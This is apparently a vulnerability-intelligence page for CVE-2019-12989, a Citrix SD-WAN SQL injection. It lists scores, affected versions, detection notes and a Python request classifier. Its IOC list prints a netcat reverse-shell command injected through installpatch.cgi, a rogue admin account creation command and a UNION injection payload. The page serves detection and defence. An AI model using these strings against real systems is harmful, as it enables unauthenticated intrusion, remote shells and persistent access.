CVE-2019-12989
published 2019-07-16

CVE-2019-12989: Citrix SD-WAN 10.2.x before 10.2.3 and NetScaler SD-WAN 10.0.x before 10.0.8 allow SQL Injection.

Priority: P1 95 · critical · 9.8 (CVSS 3.1)
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Badges: KEV · ITW · EXPLOIT
CISA Known Exploited Vulnerability, due 2022-04-15
Exploited in the wild
EPSS: 94.05% (99.8th percentile)

Affected (6 ranges)

Vendor   Product                Version range        Fixed in
citrix   citrix_sd-wan          -                    -
citrix   netscaler_adc_gateway  -                    -
citrix   netscaler_sd-wan       >= 10.0.0 < 10.0.8   10.0.8
citrix   sd-wan                 -                    -
citrix   sd-wan                 >= 10.2.0 < 10.2.3   10.2.3
citrix   xenserver              -                    -

Detection & IOCs (extracted from sources)

url      /sdwan/nitro/v1/config/get_package_file?action=file_download
path     /cgi-bin/sdwanrestapi/getpackagefile.cgi
path     /tmp/token_01234
url      /cgi-bin/vwdash.cgi?swc-token=01234
url      /cgi-bin/installpatch.cgi?swc-token=01234&installfile=`sudo%20nc%20-nv%20192.168.1.191%204444%20-e%20/bin/bash`
command  sudo nc -nv %s %d -e /bin/bash
command  perl /home/talariuser/bin/user_management.pl addUser eviladmin evilpassword 1
other    fofa-query: (title="citrix sd-wan") && icon_hash="177980953"
sigma
POST /sdwan/nitro/v1/config/get_package_file?action=file_download HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
SSL_CLIENT_VERIFY: SUCCESS

{"get_package_file": {"site_name": "test' union select md5({{num}}), 'x', 'y', 'z' #","appliance_type": "primary","package_type": "active"}}
  • Look for HTTP POST requests to /sdwan/nitro/v1/config/get_package_file?action=file_download with the custom header SSL_CLIENT_VERIFY: SUCCESS — this header is required to trigger the unauthenticated SQL injection.
  • Detect SQL UNION-based injection payloads in the 'site_name' JSON field of POST requests to the get_package_file endpoint, particularly payloads containing INTO OUTFILE targeting /tmp/.
  • Monitor for file creation in /tmp/ matching the pattern token_[0-9]+ by the 'mysql' user, which indicates successful SQL injection auth bypass.
  • Detect GET requests to /cgi-bin/installpatch.cgi with backtick-enclosed commands in the 'installfile' parameter, indicating chained command injection (CVE-2019-12991) following auth bypass.
  • A 400 HTTP response containing both 'status:"fail"' and 'Invalid value specified' from the get_package_file endpoint is the expected server response confirming successful SQL injection trigger.
  • Monitor for execution of nc (netcat) with '-e /bin/bash' arguments spawned from the web server process, indicating reverse shell establishment post-exploitation.
  • Alert on execution of user_management.pl with 'addUser' arguments from non-administrative contexts, indicating post-exploitation persistence via rogue admin account creation.
  • The SQL injection is only reachable when the HTTP header SSL_CLIENT_VERIFY is set to SUCCESS. In production deployments with a properly configured TLS-terminating proxy, this header may be restricted; if the appliance is directly internet-exposed, no such protection exists.
  • The Nuclei detection template uses a DSL matcher that checks for both the error response body ('status:"fail"', 'Invalid value specified') AND the md5 hash of a random number in the body; the second condition confirms blind data exfiltration via error messages.
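The detection notes above translate directly into request-level rules. The following is an added example (not code from the page, from Citrix, or from the Nuclei project) that runs those rules over constructed request records; the record layout (method, path, headers, body) is an assumption about what a reverse proxy or WAF in front of the appliance would log, and the installpatch.cgi sample uses a harmless constructed command rather than the reverse-shell payload listed in the IOCs.

```python
import json
import re
from urllib.parse import parse_qs, urlparse

# Endpoints named in the IOC list above.
GET_PACKAGE_FILE = "/sdwan/nitro/v1/config/get_package_file"
INSTALLPATCH = "/cgi-bin/installpatch.cgi"

# UNION/OUTFILE-style SQL fragments inside the site_name JSON field.
SQLI_RE = re.compile(r"(?i)union\s+(?:all\s+)?select|into\s+(?:out|dump)file")

# Constructed request records (not real traffic). The field layout
# (method, path, headers, body) is an assumption about what a reverse
# proxy or WAF log in front of the appliance would carry.
SAMPLE_REQUESTS = [
    {   # legitimate package download: no client-supplied header, plain site name
        "method": "POST",
        "path": GET_PACKAGE_FILE + "?action=file_download",
        "headers": {"Content-Type": "application/json"},
        "body": json.dumps({"get_package_file": {
            "site_name": "branch-01", "appliance_type": "primary",
            "package_type": "active"}}),
    },
    {   # unauthenticated SQLi probe: client-supplied SSL_CLIENT_VERIFY plus
        # the UNION payload shape from the Nuclei request above ({{num}} = 1)
        "method": "POST",
        "path": GET_PACKAGE_FILE + "?action=file_download",
        "headers": {"Content-Type": "application/json",
                    "SSL_CLIENT_VERIFY": "SUCCESS"},
        "body": json.dumps({"get_package_file": {
            "site_name": "test' union select md5(1), 'x', 'y', 'z' #",
            "appliance_type": "primary", "package_type": "active"}}),
    },
    {   # chained installpatch.cgi call with a backtick-enclosed installfile
        # value (constructed harmless command, not the page's payload)
        "method": "GET",
        "path": INSTALLPATCH + "?swc-token=01234&installfile=`echo%20test`",
        "headers": {},
        "body": "",
    },
]


def site_name_from_body(body):
    """Return get_package_file.site_name from a JSON body, or None."""
    try:
        doc = json.loads(body) if body else {}
    except ValueError:
        return None
    inner = doc.get("get_package_file") if isinstance(doc, dict) else None
    if not isinstance(inner, dict):
        return None
    value = inner.get("site_name")
    return value if isinstance(value, str) else None


def classify(req):
    """Return the list of detection names that fire for one request."""
    findings = []
    parsed = urlparse(req["path"])
    headers = {k.lower(): v for k, v in req.get("headers", {}).items()}

    if req["method"] == "POST" and parsed.path == GET_PACKAGE_FILE:
        # The header is normally set by a TLS-terminating proxy; seeing it
        # arrive from the client side is the precondition for the bug.
        if headers.get("ssl_client_verify", "").upper() == "SUCCESS":
            findings.append("client_supplied_ssl_client_verify")
        site = site_name_from_body(req.get("body", ""))
        if site is not None and SQLI_RE.search(site):
            findings.append("sqli_in_site_name")

    if req["method"] == "GET" and parsed.path == INSTALLPATCH:
        # parse_qs percent-decodes the value; backticks and $( ) indicate
        # shell substitution in what should be a file name.
        for value in parse_qs(parsed.query).get("installfile", []):
            if "`" in value or "$(" in value:
                findings.append("command_substitution_in_installfile")
                break

    return findings


def scan(requests):
    """Return (index, findings) for every request that triggers a rule."""
    hits = []
    for i, req in enumerate(requests):
        findings = classify(req)
        if findings:
            hits.append((i, findings))
    return hits


if __name__ == "__main__":
    for index, names in scan(SAMPLE_REQUESTS):
        print(f"request {index}: {', '.join(names)}")
```

The header rule is kept separate from the body rule on purpose: a client-supplied SSL_CLIENT_VERIFY on this endpoint is worth an alert on its own, because the page notes that the injection is only reachable with it, and the benign first record shows that ordinary package downloads trigger neither rule.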

CVSS provenance

Source     Version  Score  Severity  Vector
nvd        v3.1     9.8    CRITICAL  CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvd        v2.0     7.5    HIGH      AV:N/AC:L/Au:N/C:P/I:P/A:P
vulncheck  -        9.8    CRITICAL  -
cisa       -        9.8    CRITICAL  -